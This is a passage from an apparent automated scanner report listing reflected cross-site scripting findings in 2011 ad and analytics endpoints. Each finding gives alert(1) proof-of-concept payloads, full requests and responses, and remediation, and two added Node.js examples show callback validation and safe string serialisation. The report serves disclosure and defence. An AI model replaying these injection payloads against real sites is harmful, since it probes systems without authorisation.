User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=0001%3AKWC5MC0x1u8zvrMcq4GCWFCj5DwPkE0L

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:29:27 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 458
Content-Type: application/javascript

document.write( "<scr" + "ipt type='text/javascript'>var mm_context_flag = '00166f26"-alert(1)-"d2f5504bbaf';var mm_ri2 = '1309228166';var targ_score = '000';var targ_zip = '';var targ_indiv1_age = '';var targ_indiv1_gender = '';var targ_indiv1_timestamp = '';var targ_indiv2_age = '';var targ_indiv2_gender
...[SNIP]...

1.141. http://adadvisor.net/adscores/g.js [_ri parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /adscores/g.js

Issue detail

The value of the _ri request parameter is copied into the double-quoted JavaScript string passed to document.write() in the g.js response; within that string it becomes the single-quoted value of mm_ri2. The payload 8a193"-alert(1)-"3c08002ac4e was submitted in the _ri parameter and was echoed unmodified; its double quote terminates the outer document.write() string, so -alert(1)- is evaluated when the script runs.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As with 1.140, the response is a script, so the code executes in the origin of the page that includes g.js with an attacker-influenced _ri value.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be serialised as a JavaScript string literal (JSON-encoded, with <, > and & additionally escaped as \u003c, \u003e and \u0026) rather than concatenated between quote characters; here the value is nested inside a second string literal, so both layers must be encoded.

Request

GET /adscores/g.js?sid=9263342628&_ri=13092281668a193"-alert(1)-"3c08002ac4e&_cx=001 HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=0001%3AKWC5MC0x1u8zvrMcq4GCWFCj5DwPkE0L

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:29:27 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 458
Content-Type: application/javascript

document.write( "<scr" + "ipt type='text/javascript'>var mm_context_flag = '001';var mm_ri2 = '13092281668a193"-alert(1)-"3c08002ac4e';var targ_score = '000';var targ_zip = '';var targ_indiv1_age = '';var targ_indiv1_gender = '';var targ_indiv1_timestamp = '';var targ_indiv2_age = '';var targ_indiv2_gender = '';var targ_indiv2_times
...[SNIP]...

1.142. http://api.bizographics.com/v1/profile.json [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the callback request parameter (listed as &callback because the scanned URL began with ?&callback=, which yields an empty first parameter) is used without validation as the JSONP callback name and echoed at the very start of the response body. The payload 22c2c<script>alert(1)</script>b704870b2c0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

The response is served as application/json without an X-Content-Type-Options: nosniff header. A client that honours the declared type does not render the body as HTML, so the injected <script> executes only where the body is sniffed as HTML. Independently of that, the endpoint accepts any callback name verbatim, so the proof of concept demonstrates unrestricted JavaScript injection into a script response; a callback parameter should be limited to a plain identifier path.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback22c2c<script>alert(1)</script>b704870b2c0&api_key=vuy5aqx2hg8yv997yw9e5jr4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/01/04/the-secs-challenge-in-the-secondary-market/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=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; BizoNetworkPartnerIndex=15

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 28 Jun 2011 01:23:29 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=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;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 550
Connection: keep-alive

cnnad_bizo_load_ad_callback22c2c<script>alert(1)</script>b704870b2c0({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_systems_analysts","name":"IT Syste
...[SNIP]...

1.143. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is echoed unmodified inside the 403 error body, Unknown API key: (...). The payload c806c<script>alert(1)</script>2d1ff097795 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

The response is served as text/plain without an X-Content-Type-Options: nosniff header. A browser that honours the declared type displays the body as text, so the proof of concept demonstrates unencoded reflection into an error message; it becomes script execution only on a client that sniffs the body as HTML. The fix is not to echo the submitted key at all.

Request

GET /v1/profile.json?callback=load_ad_callback&api_key=18d8c7d8c4d04d1588a9cf479a85164ec806c<script>alert(1)</script>2d1ff097795 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=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; BizoNetworkPartnerIndex=15

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 28 Jun 2011 01:23:29 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (18d8c7d8c4d04d1588a9cf479a85164ec806c<script>alert(1)</script>2d1ff097795)

1.144. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is echoed unmodified inside the 403 error body, Unknown API key: (...). The payload c5987<script>alert(1)</script>2cab3bed7fe was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

As with 1.143, the response is served as text/plain without an X-Content-Type-Options: nosniff header, so the proof of concept demonstrates unencoded reflection into an error message that becomes script execution only on a client that sniffs the body as HTML. The fix is not to echo the submitted key at all.

Request

GET /v1/profile.redirect?callback_url=http%3A%2F%2Fpix04.revsci.net%2FD10889%2Fa1%2F0%2F3%2F0.gif%3FD%3DDM_LOC%3Dhttp%3A%2F%2Fbizo.com%3F&api_key=bbe168f7d7bf46369bbe29684c749a27c5987<script>alert(1)</script>2cab3bed7fe HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=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; BizoNetworkPartnerIndex=11

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 28 Jun 2011 03:01:21 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (bbe168f7d7bf46369bbe29684c749a27c5987<script>alert(1)</script>2cab3bed7fe)

1.145. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is echoed unmodified inside the 403 error body, Unknown Referer: ... (the message says Referer, but the value shown is the callback_url parameter). The payload 2c31f<script>alert(1)</script>19f2a3b4867 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

As with 1.143 and 1.144, the response is served as text/plain without an X-Content-Type-Options: nosniff header, so the proof of concept demonstrates unencoded reflection into an error message that becomes script execution only on a client that sniffs the body as HTML. The error should name the problem without repeating the rejected URL.

Request

GET /v1/profile.redirect?callback_url=2c31f<script>alert(1)</script>19f2a3b4867&api_key=bbe168f7d7bf46369bbe29684c749a27 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=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; BizoNetworkPartnerIndex=11

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 28 Jun 2011 03:01:14 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 2c31f<script>alert(1)</script>19f2a3b4867

1.146. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is used without validation as the JSONP callback name in the rc.pli response, which consists of that name followed by (""). The payload 91e12<script>alert(1)</script>06f94ed23a0 was submitted in the func parameter. This input was echoed unmodified in the application's response.

The response is served as application/x-javascript without an X-Content-Type-Options: nosniff header. As with 1.142, the <script> payload executes only where the body is sniffed as HTML (when loaded as a script, the reflected line is a syntax error rather than a callback), but the endpoint accepts any callback name verbatim, so the proof of concept demonstrates unrestricted JavaScript injection into a script response; func should be limited to a plain identifier path.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction91e12<script>alert(1)</script>06f94ed23a0&n=ar_int_p84552060&1309224228403 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_3PC=1; BMX_BR=pid=p84552060&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&exp=1309224211; ar_p84552060=exp=4&initExp=Sat May 21 12:33:10 2011&recExp=Tue Jun 28 01:23:31 2011&prad=%5B_topp_placementid%25%5D&arc=%5B_topp_adid%25%5D&; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1309224217%2E202%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Jun 2011 01:23:56 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction91e12<script>alert(1)</script>06f94ed23a0("");
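The two controls missing from findings 1.142 through 1.146 are a strict callback-name check and error responses that do not echo their input. The following JSONP responder is an added example, not code from bizographics, comScore or the scanner: the API key list, the profile object and the error strings are constructed for the example, and the callback names it exercises are taken from the report's own requests. Run with Node.js.

```javascript
// Added example (not bizographics', comScore's or the scanner's code): a JSONP
// responder with the controls findings 1.142-1.146 lack. The key list, the
// profile object and the error strings are constructed for the example; the
// callback names exercised at the bottom are taken from the report's requests.

// A callback must be a plain identifier path such as COMSCORE.BMX.Broker.handleInteraction.
// Anything else (angle brackets, quotes, operators, parentheses) is rejected
// before it can reach the response body.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;
function isSafeCallbackName(name) {
  return typeof name === 'string' && name.length <= 128 && CALLBACK_RE.test(name);
}

// JSON text that is also safe inside a script body: <, > and & are escaped so a
// value such as "</script>" cannot close a surrounding element if the response
// is ever written into an HTML document.
function scriptSafeJson(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c').replace(/>/g, '\\u003e').replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028').replace(/\u2029/g, '\\u2029');
}

// Constructed sample data standing in for the real key store and profile lookup.
const KNOWN_API_KEYS = new Set(['example-key-0001']);
const SAMPLE_PROFILE = { bizographics: { location: { code: 'texas', name: 'USA - Texas' } } };

// Build the response for GET /v1/profile.json?callback=...&api_key=...
// Every branch sets X-Content-Type-Options: nosniff so a browser cannot decide to
// treat the body as HTML, and error bodies are fixed strings: the 403 responses in
// 1.143-1.145 became reflection sinks by echoing api_key and callback_url.
function profileJsonResponse(query) {
  const nosniff = { 'X-Content-Type-Options': 'nosniff', 'Cache-Control': 'no-store' };
  if (!KNOWN_API_KEYS.has(query.api_key)) {
    return { status: 403, headers: { ...nosniff, 'Content-Type': 'text/plain; charset=utf-8' },
             body: 'Unknown API key' };
  }
  if (!isSafeCallbackName(query.callback)) {
    return { status: 400, headers: { ...nosniff, 'Content-Type': 'text/plain; charset=utf-8' },
             body: 'Invalid callback parameter' };
  }
  // The leading comment is defence in depth: the first bytes of the body are then
  // never attacker-chosen even if the name check is later loosened.
  const body = '/**/ ' + query.callback + '(' + scriptSafeJson(SAMPLE_PROFILE) + ');';
  return { status: 200,
           headers: { ...nosniff, 'Content-Type': 'application/javascript; charset=utf-8' },
           body };
}

// Callback names from the report's own requests, plus the two legitimate ones
// they were derived from.
const CANDIDATES = [
  'cnnad_bizo_load_ad_callback22c2c<script>alert(1)</script>b704870b2c0',          // 1.142
  'COMSCORE.BMX.Broker.handleInteraction91e12<script>alert(1)</script>06f94ed23a0', // 1.146
  'cnnad_bizo_load_ad_callback',
  'COMSCORE.BMX.Broker.handleInteraction',
];
for (const cb of CANDIDATES) {
  const r = profileJsonResponse({ callback: cb, api_key: 'example-key-0001' });
  console.log(r.status, r.headers['Content-Type'], r.body.slice(0, 70));
}
```

The two names copied from the report fail the identifier check and get a fixed 400 body, the two legitimate names get the JSONP body, and an unknown key gets "Unknown API key" with nothing from the request repeated. The nosniff header is what removes the residual "only if the client sniffs it as HTML" exposure noted in 1.142 through 1.146.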

1.147. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the beacon.js response, which is served as application/x-javascript. The payload 42c13<script>alert(1)</script>3825194920e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

As submitted, the payload contains no double quote, so it remains inside the string literal and the alert does not run when beacon.js is loaded as a script; it would run only if the body were rendered as HTML. The proof of concept therefore demonstrates unencoded reflection into a script string context. Whether this endpoint escapes a double quote in c1 is not shown in the report, and that is the check to make before rating the finding.

Request

GET /beacon.js?c1=242c13<script>alert(1)</script>3825194920e&c2=7290380&c3=&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:17 GMT
Date: Tue, 28 Jun 2011 01:23:17 GMT
Content-Length: 1334
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"242c13<script>alert(1)</script>3825194920e", c2:"7290380", c3:"", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
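A quick way to verify what each of these script-context reflections actually does is to evaluate the reflected statement under recording stubs instead of in a browser. The following is an added example, not part of the scanner report and not any vendor's code: it reproduces the rm_url sink from 1.139 and the COMSCORE.beacon line from 1.147 (URL fragments shortened from the report), runs both with alert and COMSCORE replaced by stubs, and then shows the string serialiser that the remediation notes for 1.139 through 1.141 call for. Run with Node.js.

```javascript
// Added example (not the scanner's or any vendor's code): re-run two reflected
// statements from this report under recording stubs, then show a serialiser that
// keeps attacker data inside the string literal. Node.js, no network access.

// Evaluate one reflected statement with `alert` and `COMSCORE` replaced by stubs
// that record their calls. Returns the final rm_url, the alert calls and the
// objects COMSCORE.beacon received, so a finding can be triaged without a browser.
function evalReflected(statement) {
  const alertCalls = [];
  const beaconCalls = [];
  const alert = (x) => { alertCalls.push(x); };
  const COMSCORE = { beacon: (o) => { beaconCalls.push(o); } };
  const fn = new Function('alert', 'COMSCORE',
    'var rm_url; ' + statement + '\nreturn rm_url;');
  const rmUrl = fn(alert, COMSCORE);
  return { rmUrl, alertCalls, beaconCalls };
}

// Finding 1.139: the parameter name lands inside a double-quoted string literal in
// an inline <script>. The `"` in the payload terminates the literal and the rest
// is parsed as the expression "..." - alert(1) - "...", so alert runs on page load.
const YM_PAYLOAD = '329c7"-alert(1)-"2dd5a4072bd';
function yieldmanagerSink(paramName) {
  return 'rm_url = "http://ad.yieldmanager.com/imp?' + paramName + '=1&Z=300x250";';
}

// Findings 1.147-1.150: the value also lands inside a double-quoted string, but the
// payload contains no `"`. A <script> tag inside a JavaScript string literal is
// just characters, so alert(1) does not execute when beacon.js loads as a script.
const CS_PAYLOAD = '242c13<script>alert(1)</script>3825194920e';
function scorecardSink(c1) {
  return 'COMSCORE.beacon({c1:"' + c1 + '", c2:"7290380", c15:""});';
}

// Hardened form of the 1.139 sink. JSON.stringify produces a valid JS string
// literal (quotes, backslashes and control characters escaped); the extra
// replacements stop the literal from closing an enclosing <script> element and
// cover the U+2028/U+2029 line terminators JSON permits but JS source does not.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
function yieldmanagerSinkFixed(paramName) {
  const url = 'http://ad.yieldmanager.com/imp?' + paramName + '=1&Z=300x250';
  return 'rm_url = ' + jsStringLiteral(url) + ';';
}

const asServed = evalReflected(yieldmanagerSink(YM_PAYLOAD));
const beaconLine = evalReflected(scorecardSink(CS_PAYLOAD));
const hardened = evalReflected(yieldmanagerSinkFixed(YM_PAYLOAD));
console.log('1.139 as served: alert calls =', asServed.alertCalls.length);
console.log('1.147 as served: alert calls =', beaconLine.alertCalls.length,
  'c1 =', beaconLine.beaconCalls[0].c1);
console.log('1.139 hardened:  alert calls =', hardened.alertCalls.length,
  'rm_url =', hardened.rmUrl);
```

The as-served 1.139 line calls alert once; the 1.147 line calls it zero times and hands COMSCORE.beacon the payload as an ordinary string; the hardened 1.139 line calls it zero times and rm_url comes back with the payload characters intact. The same serialiser, applied at both string layers, fixes the document.write() sink in 1.140 and 1.141. The stub only shows what a script does when parsed as JavaScript; it says nothing about a client that sniffs the body as HTML, which is the separate caveat the beacon.js findings carry.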



1.148. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the beacon.js response, which is served as application/x-javascript. The payload 4f23c<script>alert(1)</script>c64b0bb20a1 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

As with 1.147, the payload contains no double quote, so it remains inside the string literal and the alert does not run when beacon.js is loaded as a script; the proof of concept demonstrates unencoded reflection into a script string context, and script execution depends either on a double quote also passing unescaped (not shown in the report) or on the body being rendered as HTML.

Request

GET /beacon.js?c1=8&c2=3005693&c3=5&c4=http%3A%2F%2Fwww.businessinsider.com%2F&c5=&c6=&c10=4f23c<script>alert(1)</script>c64b0bb20a1&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:34 GMT
Date: Tue, 28 Jun 2011 01:23:34 GMT
Content-Length: 1266
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
OMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"5", c4:"http://www.businessinsider.com/", c5:"", c6:"", c10:"4f23c<script>alert(1)</script>c64b0bb20a1", c15:"", c16:"", r:""});



1.149. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the beacon.js response, which is served as application/x-javascript. The payload 6e0d9<script>alert(1)</script>55521066ad0 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

As with 1.147, the payload contains no double quote, so it remains inside the string literal and the alert does not run when beacon.js is loaded as a script; the proof of concept demonstrates unencoded reflection into a script string context, and script execution depends either on a double quote also passing unescaped (not shown in the report) or on the body being rendered as HTML.

Request

GET /beacon.js?c1=2&c2=7290380&c3=&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market&c5=&c6=&c15=6e0d9<script>alert(1)</script>55521066ad0 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:30 GMT
Date: Tue, 28 Jun 2011 01:23:30 GMT
Content-Length: 3688
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
SCORE.purge();


COMSCORE.beacon({c1:"2", c2:"7290380", c3:"", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market", c5:"", c6:"", c10:"", c15:"6e0d9<script>alert(1)</script>55521066ad0", c16:"", r:""});



1.150. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

